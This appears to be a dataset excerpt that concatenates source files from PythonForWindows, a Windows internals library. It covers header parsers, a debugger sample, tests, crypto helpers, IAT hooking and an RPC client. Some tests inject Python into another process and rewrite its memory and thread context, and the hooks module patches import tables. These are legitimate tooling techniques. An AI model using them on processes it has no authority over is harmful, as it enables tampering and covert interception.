with open(file) as yaml_file:
return addict.Dict(yaml.safe_load(yaml_file))
config = load_yaml_file(
os.path.abspath(os.path.join("smart_queue", "config", "config.yaml"))
)
logger = logging.getLogger(__name__)
logging.config.dictConfig(config.logging)
``` |
{
"source": "1orenz0/PythonForWindows",
"score": 3
} |
#### File: PythonForWindows/ctypes_generation/com_parser.py
```python
from collections import namedtuple
import dummy_wintypes
import struct_parser
from winstruct import WinStruct, WinUnion, WinStructType, Ptr, WinEnum
from simpleparser import *
class WinComParser(Parser):
PARAM_INFO = ["__RPC__deref_out", "__RPC__in", "__RPC__deref_out_opt", "__RPC__out", "__RPC__in_opt",
"__RPC__deref_opt_inout_opt", "__in", "__out", "__out_opt", "__in_opt", "__inout",
"__reserved", "__RPC__in_opt_string", "__RPC__inout_opt", "__RPC__in_string", "__deref_out_opt", "__RPC__inout"]
PARAM_INFO_WITH_VALUE = ["__RPC__in_ecount", "__RPC__out_ecount_part", "__RPC__in_ecount_full",
"__RPC__in_range", "__RPC__out_ecount_full", "__out_ecount_opt", "__out_ecount", "__in_ecount_opt",
"__in_ecount", "__out_bcount_opt", "__out_bcount", "__in_bcount", "__in_bcount_opt", "__RPC__out_ecount_full_string"]
def __init__(self, data):
# data = self.initial_processing(data)
#print(data)
super(WinComParser, self).__init__(data)
def assert_name(self, expected_name, n=None):
if n is None:
n = self.assert_token_type(NameToken)
if n.value != expected_name:
raise ParsingError("Expected name {0} got {1} instead".format(expected_name, n.value))
return n
def parse_argument(self):
byreflevel = 0
# Pass __RPC__deref_out
while self.peek() in [NameToken(x) for x in self.PARAM_INFO + self.PARAM_INFO_WITH_VALUE]:
ign = self.assert_token_type(NameToken)
if ign.value in self.PARAM_INFO_WITH_VALUE:
# pass __RPC__in_ecount(cNames)
self.assert_token_type(OpenParenthesisToken)
while type(self.peek()) != CloseParenthesisToken:
self.next_token()
self.next_token()
if self.peek() == KeywordToken("const"):
self.next_token()
type_name = self.assert_token_type(NameToken)
if type_name.value.startswith("_"):
print("type_name = <{0}> might be a PARAM_INFO".format(type_name.value))
while type(self.peek()) == StarToken:
byreflevel += 1
discard_star = self.next_token()
arg_name = self.assert_token_type(NameToken)
if type(self.peek()) not in [CommaToken, CloseParenthesisToken]:
raise ParsingError("COM PARSING: argument decl should finish by <,> or <)> (arg {0})".format(type_name.value))
if type(self.peek()) == CommaToken:
self.assert_token_type(CommaToken)
return type_name.value, byreflevel, arg_name.value
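    # Illustration with hypothetical declarations (for intuition only): parsing
    #   "__RPC__in REFIID riid,"           is expected to yield ("REFIID", 0, "riid")
    #   "__RPC__deref_out IUnknown **ppv," is expected to yield ("IUnknown", 2, "ppv")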
def parse_method(self):
ret_type = self.assert_token_type(NameToken)
#print(ret_type)
self.assert_token_type(OpenParenthesisToken)
self.assert_name("STDMETHODCALLTYPE")
#if type(self.peek()) == StarToken:
self.assert_token_type(StarToken)
method_name = self.assert_token_type(NameToken)
#print("Parsing method <{0}>".format(method_name))
self.assert_token_type(CloseParenthesisToken)
args = []
self.assert_token_type(OpenParenthesisToken)
while type(self.peek()) != CloseParenthesisToken:
if self.peek().value == "...": #TODO: '...' token ?
self.next_token()
# '...' should be last token before ')'
args.append("...") # Put a type ?
assert type(self.peek()) == CloseParenthesisToken
continue
args.append(self.parse_argument())
#print("Pass <{0}>".format(p))
self.next_token()
self.assert_token_type(SemiColonToken)
return ret_type.value, method_name.value, args
def parse(self):
tok = self.peek()
if type(tok) == NameToken and tok.value == "@IID:":
self.next_token()
iid = self.assert_token_type(NameToken).value
else:
iid = None
self.assert_keyword("typedef")
self.assert_keyword("struct")
vtable_name = self.assert_token_type(NameToken).value
self.assert_token_type(OpenBracketToken)
self.assert_name("BEGIN_INTERFACE")
res = WinCOMVTABLE(vtable_name)
res.iid = iid
while self.peek() != NameToken("END_INTERFACE"):
ret_type, method_name, args = self.parse_method()
#print("Method name is {0}".format(method_name))
for arg in args:
pass
#print(" Param is {0}".format(arg))
res.add_method(ret_type, method_name, args)
end_interface = self.assert_name("END_INTERFACE")
self.assert_token_type(CloseBracketToken)
typdef = self.assert_token_type(NameToken)
# Do a real thing able to see multiple typedef..
typedefptr = None
if type(self.peek()) == CommaToken:
self.next_token()
self.assert_token_type(StarToken)
typedefptr = self.assert_token_type(NameToken).value
self.assert_token_type(SemiColonToken)
res.typedefptr = typedefptr
return res
#print(self.data)
Method = namedtuple("Method", ["ret_type", "name", "args", 'functype'])
MethodArg = namedtuple("MethodArg", ["type", "byreflevel", "name"])
class WinCOMVTABLE(object):
def __init__(self, vtbl_name):
self.vtbl_name = vtbl_name
if not vtbl_name.endswith("Vtbl"):
raise ValueError("Com interface are expected to finish by <Vtbl> got <{0}".format(vtbl.name))
self.name = vtbl_name[:-len("Vtbl")]
self.methods = []
def add_method(self, ret_type, method_name, args):
new_args = []
functype = 'stdcall'
if args[-1] == "...":
print("{0}.{1} is a cdecl COM method".format(self.name, method_name))
args = args[:-1]
functype = 'cdecl'
for type, byreflevel, name in args:
if type in ["long", "int"]:
type = type.upper()
new_args.append(MethodArg(type, byreflevel, name))
if ret_type in ["long", "int"]:
ret_type = ret_type.upper()
self.methods.append(Method(ret_type, method_name, new_args, functype))
if __name__ == "__main__":
import sys
x = WinComParser(open(sys.argv[1]).read()).parse()
print(x)
```
#### File: ctypes_generation/extended_structs/PSID.py
```python
_INITIAL_PSID = PSID
class PSID(_INITIAL_PSID): # _INITIAL_PSID -> PVOID
# def __init__(self, strsid=None):
# if strsid is not None:
# windows.winproxy.ConvertStringSidToSidA(strsid, self)
def __str__(self):
sid_str = LPCSTR()
windows.winproxy.ConvertSidToStringSidA(self, sid_str)
result = sid_str.value
windows.winproxy.LocalFree(sid_str)
return result
def __eq__(self, other):
return windows.winproxy.EqualSid(self, other)
@property
def size(self):
return windows.winproxy.GetLengthSid(self)
def duplicate(self):
size = self.size
buffer = ctypes.c_buffer(size)
windows.winproxy.CopySid(size, buffer, self)
return ctypes.cast(buffer, type(self))
@classmethod
def from_string(cls, strsid):
self = cls()
windows.winproxy.ConvertStringSidToSidA(strsid, self)
return self
def to_string(self):
sid_str = LPCSTR()
windows.winproxy.ConvertSidToStringSidA(self, sid_str)
result = sid_str.value
windows.winproxy.LocalFree(sid_str)
return result
def __repr__(self):
try:
return """<{0} "{1}">""".format(type(self).__name__, self.to_string())
except WindowsError: # Case where the PSID is not valid
if not self:
return """<{0} (NULL) at {1:#x}>""".format(type(self).__name__, id(self))
return """<{0} "<conversion-failed>" at {1:#x}>""".format(type(self).__name__, id(self))
__sprint__ = __repr__
```
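A small usage sketch for the extended ``PSID`` above. It is hedged: it assumes the generated type ends up reachable as ``windows.generated_def.PSID`` after the ctypes generation step, and it only runs on Windows with PythonForWindows installed.

```python
# Hedged sketch: the import path is an assumption about where the generated
# PSID lands; S-1-5-18 is the well-known LocalSystem SID.
import windows
import windows.generated_def as gdef

system_sid = gdef.PSID.from_string("S-1-5-18")
print(str(system_sid))            # -> "S-1-5-18" via ConvertSidToStringSidA
print(system_sid.size)            # byte length from GetLengthSid
copy = system_sid.duplicate()     # independent buffer holding the same SID
assert copy == system_sid         # EqualSid-based comparison
```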
#### File: PythonForWindows/ctypes_generation/struct_parser.py
```python
import dummy_wintypes
import itertools
from winstruct import WinStruct, WinUnion, WinStructType, Ptr, WinEnum, BitFieldValue
from simpleparser import *
class WinStructParser(Parser):
def __init__(self, *args, **kwargs):
super(WinStructParser, self).__init__(*args, **kwargs)
self.pack = None
def parse_array_or_bitfield(self):
if type(self.peek()) == OpenSquareBracketToken:
# Array
self.assert_token_type(OpenSquareBracketToken)
number = self.assert_token_type(NameToken).value
self.assert_token_type(CloseSquareBracketToken)
return number
# Bitfield
self.assert_token_type(ColonToken)
nb_bits = self.promote_to_int(self.next_token())
return BitFieldValue(nb_bits)
def parse_def(self):
if self.peek() == KeywordToken("struct"):
discard = self.next_token()
def_type_tok = self.assert_token_type(NameToken)
def_type = WinStructType(def_type_tok.value)
if type(self.peek()) == StarToken:
def_type = Ptr(def_type)
discard_star = self.next_token()
def_name = self.assert_token_type(NameToken)
if type(self.peek()) == SemiColonToken:
self.next_token()
return (def_type, def_name, 1)
number_rep = self.parse_array_or_bitfield()
self.assert_token_type(SemiColonToken)
return (def_type, def_name, number_rep)
def parse_typedef(self, struct):
if type(self.peek()) == SemiColonToken: # Just a ; no typedef
self.next_token()
return
sep = CommaToken()
while type(sep) == CommaToken:
add_to_typedef = struct.add_typedef
if type(self.peek()) == StarToken:
self.next_token()
add_to_typedef = struct.add_ptr_typedef
name = self.assert_token_type(NameToken)
# UGLY HACK for LDR definition
if name.value == "RESTRICTED_POINTER":
name = self.assert_token_type(NameToken)
add_to_typedef(name.value)
sep = self.next_token()
self.assert_token_type(SemiColonToken, sep)
def parse_enum(self, is_typedef):
"""Handle enum typedef with no value assignement and 1 typedef after"""
if not type(self.peek()) == OpenBracketToken:
# Not an ANON enum
enum_name = self.assert_token_type(NameToken).value
res_enum = WinEnum(enum_name)
else:
if not is_typedef:
raise ValueError("Anonymous union not in a typedef")
res_enum = WinEnum(None)
self.assert_token_type(OpenBracketToken)
count = itertools.count()
assigned_value = False
while type(self.peek()) != CloseBracketToken:
i = next(count)
name = self.assert_token_type(NameToken)
if type(self.peek()) == EqualToken:
if i != 0 and not assigned_value:
raise ParsingError("Enum {0} mix def with and without equal".format(enum_name))
assigned_value = True
self.assert_token_type(EqualToken)
i = self.promote_to_int(self.next_token())
else:
if assigned_value:
raise ParsingError("Enum {0} mix def with and without equal".format(enum_name))
res_enum.add_enum_entry(i, name.value)
if not type(self.peek()) == CloseBracketToken:
self.assert_token_type(CommaToken)
self.assert_token_type(CloseBracketToken)
self.parse_typedef(res_enum)
#other_name = self.assert_token_type(NameToken).value
#res_enum.add_typedef(other_name)
#self.assert_token_type(SemiColonToken)
return res_enum
def parse_winstruct(self):
is_typedef = False
peeked = self.peek()
if peeked == KeywordToken("typedef"):
self.assert_keyword("typedef")
is_typedef = True
def_type = self.assert_token_type(KeywordToken)
if def_type.value == "enum":
return self.parse_enum(is_typedef)
if def_type.value == "struct":
WinDefType = WinStruct
elif def_type.value == "union":
WinDefType = WinUnion
else:
raise ParsingError("Expecting union or struct got <{0}> instead".format(def_type.value))
if not type(self.peek()) == OpenBracketToken:
# Not an anonymous structure def
struct_name = self.assert_token_type(NameToken).value
else:
# Anonymous structure def: check if we are in a typedef
if not is_typedef:
raise ValueError("Anonymous structure/union not in a typedef")
struct_name = None #
self.assert_token_type(OpenBracketToken)
result = WinDefType(struct_name, self.pack)
while type(self.peek()) != CloseBracketToken:
tok_type, tok_name, nb_rep = self.parse_def()
result.add_field((tok_type, tok_name.value, nb_rep))
self.assert_token_type(CloseBracketToken)
if is_typedef:
self.parse_typedef(result)
else:
self.assert_token_type(SemiColonToken)
return result
def parse(self):
strucs = []
enums = []
while self.peek() is not None:
# HANDLE PRAGMA_PACK / PRAGMA_NOPACK
if type(self.peek()) == NameToken:
pragma = self.next_token().value
if pragma == "PRAGMA_NOPACK":
self.pack = None
continue
if pragma != "PRAGMA_PACK":
raise ValueError("Expected struct/union def or PRAGMA_[NO]PACK")
pack_value = self.promote_to_int(self.next_token())
self.pack = pack_value
x = self.parse_winstruct()
#x.packing = self.pack
#if x.packing != None:
# print("{0} pack = {1}".format(x.name, x.packing))
if type(x) == WinStruct or type(x) == WinUnion:
strucs.append(x)
elif type(x) == WinEnum:
enums.append(x)
else:
raise ValueError("Unknow returned type {0}".format(x))
return strucs, enums
class SimpleTypeDefine(object):
def __init__(self, lvalue, rvalue):
self.lvalue = lvalue
self.rvalue = rvalue
def generate_ctypes(self):
return "{self.lvalue} = {self.rvalue}".format(self=self)
class SimpleTypesParser(Parser):
def __init__(self, data):
self.lexer = iter(Lexer(self.initial_processing(data), newlinetoken=True))
self.peek_token = None
def parse(self):
results = []
while self.peek() is not None:
lvalue = self.assert_token_type(NameToken).value
self.assert_token_type(EqualToken)
rvalue = ""
while type(self.peek()) is not NewLineToken:
rvalue += self.next_token().value
results.append(SimpleTypeDefine(lvalue, rvalue))
while type(self.peek()) is NewLineToken: # discard the NewLineToken(s)
self.next_token()
return results
def dbg_lexer(data):
for i in Lexer(data).token_generation():
print(i)
def dbg_parser(data):
return WinStructParser(data).parse()
def dbg_validate(data):
return validate_structs(Parser(data).parse())
if __name__ == "__main__":
import sys
#data = open(sys.argv[1], 'r').read()
#ctypes_code = generate_ctypes(data)
```
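To give a feel for the parser above, here is a hedged sketch that feeds it one small structure definition; the exact set of tokens accepted depends on ``simpleparser``, so the input below is an assumption rather than a documented format.

```python
# Hedged sketch: run from the ctypes_generation directory so the local
# imports (simpleparser, winstruct, dummy_wintypes) resolve.
from struct_parser import WinStructParser

SOURCE = """
typedef struct _SMALL_POINT {
    LONG x;
    LONG y;
} SMALL_POINT, *PSMALL_POINT;
"""

structs, enums = WinStructParser(SOURCE).parse()
print([s.name for s in structs])   # assumption: WinStruct exposes a .name attribute
print(enums)                       # no enum in this input -> []
```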
#### File: samples/debug/local_debugger.py
```python
import sys
import os.path
import pprint
sys.path.append(os.path.abspath(__file__ + "\..\.."))
import windows
from windows.generated_def.winstructs import *
import windows.native_exec.simple_x86 as x86
class SingleSteppingDebugger(windows.debug.LocalDebugger):
SINGLE_STEP_COUNT = 4
def on_exception(self, exc):
code = self.get_exception_code()
context = self.get_exception_context()
print("EXCEPTION !!!! Got a {0} at 0x{1:x}".format(code, context.pc))
self.SINGLE_STEP_COUNT -= 1
if self.SINGLE_STEP_COUNT:
return self.single_step()
return EXCEPTION_CONTINUE_EXECUTION
class RewriteBreakpoint(windows.debug.HXBreakpoint):
def trigger(self, dbg, exc):
context = dbg.get_exception_context()
print("GOT AN HXBP at 0x{0:x}".format(context.pc))
# Rewrite the infinite loop with 2 nop
windows.current_process.write_memory(self.addr, "\x90\x90")
# Ask for a single stepping
return dbg.single_step()
d = SingleSteppingDebugger()
# Infinite loop + nop + ret
code = x86.assemble("label :begin; jmp :begin; nop; ret")
func = windows.native_exec.create_function(code, [PVOID])
print("Code addr = 0x{0:x}".format(func.code_addr))
# Create a thread that will infinite loop
t = windows.current_process.create_thread(func.code_addr, 0)
# Add a breakpoint on the infinite loop
d.add_bp(RewriteBreakpoint(func.code_addr))
t.wait()
print("Done!")
```
#### File: PythonForWindows/tests/test_system.py
```python
import pytest
import windows
from pfwtest import *
@check_for_gc_garbage
class TestSystemWithCheckGarbage(object):
def test_version(self):
return windows.system.version
def test_version_name(self):
return windows.system.version_name
def test_computer_name(self):
return windows.system.computer_name
def test_services(self):
return windows.system.services
def test_logicaldrives(self):
return windows.system.logicaldrives
def test_wmi(self):
return windows.system.wmi
def test_handles(self):
return windows.system.handles
def test_handle_process(self):
handle_with_process = [h for h in windows.system.handles if h.dwProcessId]
handle = handle_with_process[-1]
proc = handle.process
assert proc.pid == handle.dwProcessId
def test_system_modules_ntosk(self):
assert windows.system.modules[0].name.endswith("ntoskrnl.exe")
@check_for_gc_garbage
class TestSystemWithCheckGarbageAndHandleLeak(object):
def test_threads(self):
return windows.system.threads
def test_processes(self):
procs = windows.system.processes
assert windows.current_process.pid in [p.pid for p in procs]
def test_system_modules(self):
return windows.system.modules
```
#### File: PythonForWindows/tests/test_syswow.py
```python
import pytest
import textwrap
import windows
import windows.generated_def as gdef
import windows.native_exec.simple_x86 as x86
import windows.native_exec.simple_x64 as x64
from pfwtest import *
pytestmark = pytest.mark.usefixtures('check_for_gc_garbage')
@process_syswow_only
class TestSyswowCurrentProcess(object):
def test_exec_syswow(self):
x64_code = x64.assemble("mov rax, 0x4040404040404040; mov r11, 0x0202020202020202; add rax, r11; ret")
res = windows.syswow64.execute_64bits_code_from_syswow(x64_code)
assert res == 0x4242424242424242
def test_self_pebsyswow(self):
peb64 = windows.current_process.peb_syswow
modules_names = [m.name for m in peb64.modules]
assert "wow64.dll" in modules_names
# Parsing
wow64 = [m for m in peb64.modules if m.name == "wow64.dll"][0]
assert "Wow64LdrpInitialize" in wow64.pe.exports
@python_injection
@windows_64bit_only
class TestSyswowRemoteProcess(object):
def test_remote_pebsyswow(self, proc32):
peb64 = proc32.peb_syswow
modules_names = [m.name for m in peb64.modules]
assert "wow64.dll" in modules_names
# Parsing
wow64 = [m for m in peb64.modules if m.name == "wow64.dll"][0]
assert "Wow64LdrpInitialize" in wow64.pe.exports
def test_getset_syswow_context(self, proc32):
addr = proc32.virtual_alloc(0x1000)
remote_python_code = """
import windows
import windows.native_exec.simple_x64 as x64
windows.utils.create_console()
x64_code = x64.assemble("mov r11, 0x1122334455667788; mov rax, 0x8877665544332211; mov [{0}], rax ;label :loop; jmp :loop; nop; nop; ret")
res = windows.syswow64.execute_64bits_code_from_syswow(x64_code)
print("res = {{0}}".format(hex(res)))
windows.current_process.write_qword({0}, res)
""".format(addr)
t = proc32.execute_python_unsafe(textwrap.dedent(remote_python_code))
# Wait for python execution
while proc32.read_qword(addr) != 0x8877665544332211:
pass
ctx = t.context_syswow
# Check the get context
assert ctx.R11 == 0x1122334455667788
assert proc32.read_memory(ctx.Rip, 2) == x64.assemble("label :loop; jmp :loop")
t.suspend()
proc32.write_memory(ctx.Rip, "\x90\x90")
# Check the set context
RETURN_VALUE = 0x4041424344454647
ctx.Rax = RETURN_VALUE
ctx.Rip += 2
t.set_syswow_context(ctx)
t.resume()
t.wait()
assert RETURN_VALUE == proc32.read_qword(addr)
```
#### File: PythonForWindows/tests/test_wintrust.py
```python
import sys
import pytest
import windows
import windows.generated_def as gdef
from pfwtest import *
pytestmark = pytest.mark.usefixtures('check_for_gc_garbage')
def test_script_file_not_signed():
assert not windows.wintrust.is_signed(__file__)
assert windows.wintrust.check_signature(__file__) == gdef.TRUST_E_SUBJECT_FORM_UNKNOWN
def test_python_not_signed():
python_path = sys.executable
assert not windows.wintrust.is_signed(python_path)
assert windows.wintrust.check_signature(python_path) == gdef.TRUST_E_NOSIGNATURE
def test_kernel32_signed():
k32_path = r"C:\windows\system32\kernel32.dll"
assert windows.wintrust.is_signed(k32_path)
assert windows.wintrust.check_signature(k32_path) == 0
```
#### File: windows/crypto/encrypt_decrypt.py
```python
from os import urandom
from windows import winproxy
from windows.crypto import DEFAULT_ENCODING
from windows.generated_def import *
__all__ = ["encrypt", "decrypt"]
def encode_init_vector(data):
blob = CRYPT_DATA_BLOB.from_string(data)
size = DWORD()
buf = None
winproxy.CryptEncodeObjectEx(DEFAULT_ENCODING, X509_OCTET_STRING, ctypes.byref(blob), 0, None, buf, size)
buf = (BYTE * size.value)()
winproxy.CryptEncodeObjectEx(DEFAULT_ENCODING, X509_OCTET_STRING, ctypes.byref(blob), 0, None, buf, size)
return buf[:]
class GenerateInitVector(object):
def __repr__(self):
return "GenerateInitVector()"
def generate_init_vector(self, algo):
if algo in [szOID_OIWSEC_desCBC, szOID_RSA_DES_EDE3_CBC]:
return urandom(8)
if algo in [szOID_NIST_AES128_CBC, szOID_NIST_AES192_CBC, szOID_NIST_AES256_CBC]:
return urandom(16)
return None
geninitvector = GenerateInitVector()
def encrypt(cert_or_certlist, msg, algo=szOID_NIST_AES256_CBC, initvector=geninitvector):
"""Encrypt ``msg`` one or many :class:`Certificate` using ``algo`` with the initial
vector ``initvector``.
If ``geninitvector`` is left as it is, it will generate a random one.
Algorithms supported by ``GenerateInitVector`` are:
* ``szOID_OIWSEC_desCBC``
* ``szOID_RSA_DES_EDE3_CBC``
* ``szOID_NIST_AES128_CBC``
* ``szOID_NIST_AES192_CBC``
* ``szOID_NIST_AES256_CBC``
:param cert_or_certlist: One or many :class:`Certificate` used to encrypt the msg
:type cert_or_certlist: :class:`Certificate` | [:class:`Certificate`]
:return: :class:`bytearray`: The encrypted message
"""
alg_ident = CRYPT_ALGORITHM_IDENTIFIER()
alg_ident.pszObjId = algo
# We want automatic translation of Certificate -> PCERT_CONTEXT
# in order to simply create the 'PCERT_CONTEXT[] certs' array.
# For that we need a tuple of X 1-item-tuples,
# as a (cert,) is automatically translatable to a PCERT_CONTEXT
if isinstance(cert_or_certlist, CERT_CONTEXT):
certlist = ((cert_or_certlist,),)
else:
certlist = tuple((c,) for c in cert_or_certlist)
# Set (compute if needed) the IV
if initvector is None:
alg_ident.Parameters.cbData = 0
elif initvector is geninitvector:
initvector = initvector.generate_init_vector(algo)
if initvector is None:
raise ValueError("I don't know how to generate an <initvector> for <{0}> please provide one (or None)".format(algo))
initvector_encoded = encode_init_vector(initvector)
alg_ident.Parameters = CRYPT_DATA_BLOB.from_string(initvector_encoded)
else:
initvector_encoded = encode_init_vector(initvector)
alg_ident.Parameters = CRYPT_DATA_BLOB.from_string(initvector_encoded)
# Setup encryption parameters
param = CRYPT_ENCRYPT_MESSAGE_PARA()
param.cbSize = ctypes.sizeof(param)
param.dwMsgEncodingType = DEFAULT_ENCODING
param.hCryptProv = None
param.ContentEncryptionAlgorithm = alg_ident
param.pvEncryptionAuxInfo = None
param.dwFlags = 0
param.dwInnerContentType = 0
certs = (PCERT_CONTEXT * len(certlist))(*certlist)
#Ask the output buffer size
size = DWORD()
winproxy.CryptEncryptMessage(param, len(certs), certs, msg, len(msg), None, size)
#Encrypt the msg
buf = (BYTE * size.value)()
winproxy.CryptEncryptMessage(param, len(certs), certs, msg, len(msg), buf, size)
return bytearray(buf[:size.value])
def decrypt(cert_store, encrypted):
"""Try to decrypt the ``encrypted`` msg with any certificate in ``cert_store``.
If no certificate in the store can decrypt the message, ``WinproxyError(winerror=0x8009200c)`` is raised.
:param cert_store: The store containing the candidate decryption certificates
:type cert_store: :class:`CertificateStore`
:return: :class:`str`: The decrypted message
"""
# Setup decryption parameters
dparam = CRYPT_DECRYPT_MESSAGE_PARA()
dparam.cbSize = ctypes.sizeof(dparam)
dparam.dwMsgAndCertEncodingType = DEFAULT_ENCODING
dparam.cCertStore = 1
dparam.rghCertStore = (cert_store,)
dparam.dwFlags = 0
#Ask the output buffer size
buf = (BYTE * len(encrypted)).from_buffer_copy(encrypted)
dcryptsize = DWORD()
winproxy.CryptDecryptMessage(dparam, buf, ctypes.sizeof(buf), None, dcryptsize, None)
#Decrypt the msg
dcryptbuff = (BYTE * dcryptsize.value)()
winproxy.CryptDecryptMessage(dparam, buf, ctypes.sizeof(buf), dcryptbuff, dcryptsize, None)
return str(bytearray(dcryptbuff[:dcryptsize.value]))
```
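A hedged round-trip sketch for ``encrypt``/``decrypt`` above. Only those two functions come from this module; the PFX import helper, the ``.certs`` attribute, the file name and the password are illustrative assumptions about the rest of ``windows.crypto``.

```python
# Hedged sketch: import_pfx / .certs and the .pfx file are assumptions,
# encrypt()/decrypt() are the functions defined above.
import windows.crypto
from windows.generated_def import szOID_NIST_AES256_CBC

# Hypothetical: load a test certificate + private key into an in-memory store.
pfx = windows.crypto.import_pfx(open("test.pfx", "rb").read(), "password")
cert = pfx.certs[0]

blob = windows.crypto.encrypt(cert, "some secret", algo=szOID_NIST_AES256_CBC)
clear = windows.crypto.decrypt(pfx, blob)
assert clear == "some secret"
```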
#### File: PythonForWindows/windows/hooks.py
```python
import sys
import ctypes
import windows
import windows.utils as utils
from . import native_exec
from .generated_def import winfuncs
from .generated_def.windef import PAGE_EXECUTE_READWRITE
from .generated_def.winstructs import *
# TODO Not a big fan of importing 'meta' every load
# Should do an Hook API that take the winproxy function (not generate every hook possible)
import windows.generated_def.meta
class Callback(object):
"""Give type information to hook callback"""
def __init__(self, *types):
self.types = types
def __call__(self, func):
func._types_info = self.types
return func
class KnownCallback(object):
types = ()
def __call__(self, func):
func._types_info = self.types
return func
def add_callback_to_module(callback):
setattr(sys.modules[__name__], type(callback).__name__, callback)
# Generate IATCallback decorator for all known functions
for func in windows.generated_def.meta.functions:
prototype = getattr(winfuncs, func + "Prototype")
callback_name = func + "Callback"
class CallBackDeclaration(KnownCallback):
types = (prototype._restype_,) + prototype._argtypes_
CallBackDeclaration.__name__ = callback_name
add_callback_to_module(CallBackDeclaration())
class IATHook(object):
"""Look at my hook <3"""
yolo = []
def __init__(self, IAT_entry, callback, types=None):
if types is None:
if not hasattr(callback, "_types_info"):
raise ValueError("Callback for IATHook has no type infomations")
types = callback._types_info
self.original_types = types
self.callback_types = self.transform_arguments(self.original_types)
self.entry = IAT_entry
self.callback = callback
self.stub = ctypes.WINFUNCTYPE(*self.callback_types)(self.hook_callback)
self.stub_addr = ctypes.cast(self.stub, PVOID).value
self.realfunction = ctypes.WINFUNCTYPE(*types)(IAT_entry.nonhookvalue)
self.is_enable = False
#IATHook.yolo.append(self)
def transform_arguments(self, types):
res = []
for type in types:
if type in (ctypes.c_wchar_p, ctypes.c_char_p):
res.append(ctypes.c_void_p)
else:
res.append(type)
return res
def enable(self):
"""Enable the IAT hook: you MUST keep a reference to the IATHook while the hook is enabled"""
with utils.VirtualProtected(self.entry.addr, ctypes.sizeof(PVOID), PAGE_EXECUTE_READWRITE):
self.entry.value = self.stub_addr
self.is_enable = True
def disable(self):
"""Disable the IAT hook"""
with utils.VirtualProtected(self.entry.addr, ctypes.sizeof(PVOID), PAGE_EXECUTE_READWRITE):
self.entry.value = self.entry.nonhookvalue
self.is_enable = False
def hook_callback(self, *args):
adapted_args = []
for value, type in zip(args, self.original_types[1:]):
if type == ctypes.c_wchar_p:
adapted_args.append(ctypes.c_wchar_p(value))
elif type == ctypes.c_char_p:
adapted_args.append(ctypes.c_char_p((value)))
else:
adapted_args.append(value)
def real_function(*args):
if args == ():
args = adapted_args
return self.realfunction(*args)
return self.callback(*adapted_args, real_function=real_function)
# Use this tricks to prevent garbage collection of hook ?
#def __del__(self):
# pass
## New simple hook API based on winproxy
def setup_hook(target, hook, dll_to_hook):
"TODO: Test and doc :D"
dll_name, api_name = windows.winproxy.get_target(target)
prototype = target.prototype
hook._types_info = (prototype._restype_,) + prototype._argtypes_
if not dll_name.endswith(".dll"):
dll_name += ".dll"
# Get the peb of our process
peb = windows.current_process.peb
# Get the dll_to_hook
module_to_hook = [m for m in peb.modules if m.name.lower() == dll_to_hook.lower()][0]
# Get the iat entries for DLL dll_name
adv_imports = module_to_hook.pe.imports[dll_name]
# Get RegOpenKeyExA iat entry
iat = [n for n in adv_imports if n.name == api_name][0]
iat.set_hook(hook)
return iat
```
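A hedged sketch of wiring up an IAT hook with ``setup_hook`` above. Hooking ``CreateFileA`` as imported by our own main module is an illustrative choice (the module must actually import kernel32!CreateFileA), and it assumes ``windows.winproxy.CreateFileA`` carries the ``prototype`` attribute ``setup_hook`` relies on.

```python
# Hedged sketch based on setup_hook() above: the hooked API and module are
# illustrative; real_function() replays the original call untouched.
import windows
import windows.hooks as hooks

def createfile_hook(*args, **kwargs):
    real_function = kwargs["real_function"]
    print("CreateFileA called with {0} argument(s)".format(len(args)))
    return real_function()

main_module_name = windows.current_process.peb.modules[0].name
iat_entry = hooks.setup_hook(windows.winproxy.CreateFileA, createfile_hook, main_module_name)
```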
#### File: windows/rpc/client.py
```python
import ctypes
import struct
import windows.alpc as alpc
import windows.com
import windows.generated_def as gdef
KNOW_REQUEST_TYPE = gdef.FlagMapper(gdef.RPC_REQUEST_TYPE_CALL, gdef.RPC_REQUEST_TYPE_BIND)
KNOW_RESPONSE_TYPE = gdef.FlagMapper(gdef.RPC_RESPONSE_TYPE_FAIL, gdef.RPC_RESPONSE_TYPE_SUCCESS, gdef.RPC_RESPONSE_TYPE_BIND_OK)
KNOWN_RPC_ERROR_CODE = gdef.FlagMapper(
gdef.ERROR_INVALID_HANDLE,
gdef.RPC_X_BAD_STUB_DATA,
gdef.RPC_S_UNKNOWN_IF,
gdef.RPC_S_PROTOCOL_ERROR,
gdef.RPC_S_UNSUPPORTED_TRANS_SYN,
gdef.RPC_S_PROCNUM_OUT_OF_RANGE)
NOT_USED = 0xBAADF00D
class ALPC_RPC_BIND(ctypes.Structure):
_pack_ = 1
_fields_ = [
("request_type", gdef.DWORD),
("UNK1", gdef.DWORD),
("UNK2", gdef.DWORD),
("target", gdef.RPC_IF_ID),
("flags", gdef.DWORD),
("if_nb_ndr32", gdef.USHORT),
("if_nb_ndr64", gdef.USHORT),
("if_nb_unkn", gdef.USHORT),
("PAD", gdef.USHORT),
("register_multiple_syntax", gdef.DWORD),
("use_flow", gdef.DWORD),
("UNK5", gdef.DWORD),
("maybe_flow_id", gdef.DWORD),
("UNK7", gdef.DWORD),
("some_context_id", gdef.DWORD),
("UNK9", gdef.DWORD),
]
class ALPC_RPC_CALL(ctypes.Structure):
_pack_ = 1
_fields_ = [
("request_type", gdef.DWORD),
("UNK1", gdef.DWORD),
("flags",gdef.DWORD),
("request_id", gdef.DWORD),
("if_nb", gdef.DWORD),
("method_offset", gdef.DWORD),
("UNK2", gdef.DWORD),
("UNK3", gdef.DWORD),
("UNK4", gdef.DWORD),
("UNK5", gdef.DWORD),
("UNK6", gdef.DWORD),
("UNK7", gdef.DWORD),
("UNK8", gdef.DWORD),
("UNK9", gdef.DWORD),
("UNK10", gdef.DWORD),
("UNK11", gdef.DWORD),
]
class RPCClient(object):
"""A client for RPC-over-ALPC able to bind to interface and perform calls using NDR32 marshalling"""
REQUEST_IDENTIFIER = 0x11223344
def __init__(self, port):
self.alpc_client = alpc.AlpcClient(port)
self.number_of_bind_if = 0 # if -> interface
self.if_bind_number = {}
def bind(self, IID_str, version=(1,0)):
"""Bind to the ``IID_str`` with the given ``version``
:returns: :class:`windows.generated_def.IID`
"""
IID = windows.com.IID.from_string(IID_str)
request = self._forge_bind_request(IID, version, self.number_of_bind_if)
response = self._send_request(request)
# Parse response
request_type = self._get_request_type(response)
if request_type != gdef.RPC_RESPONSE_TYPE_BIND_OK:
raise ValueError("Unexpected reponse type. Expected RESPONSE_TYPE_BIND_OK got {0}".format(KNOW_RESPONSE_TYPE[request_type]))
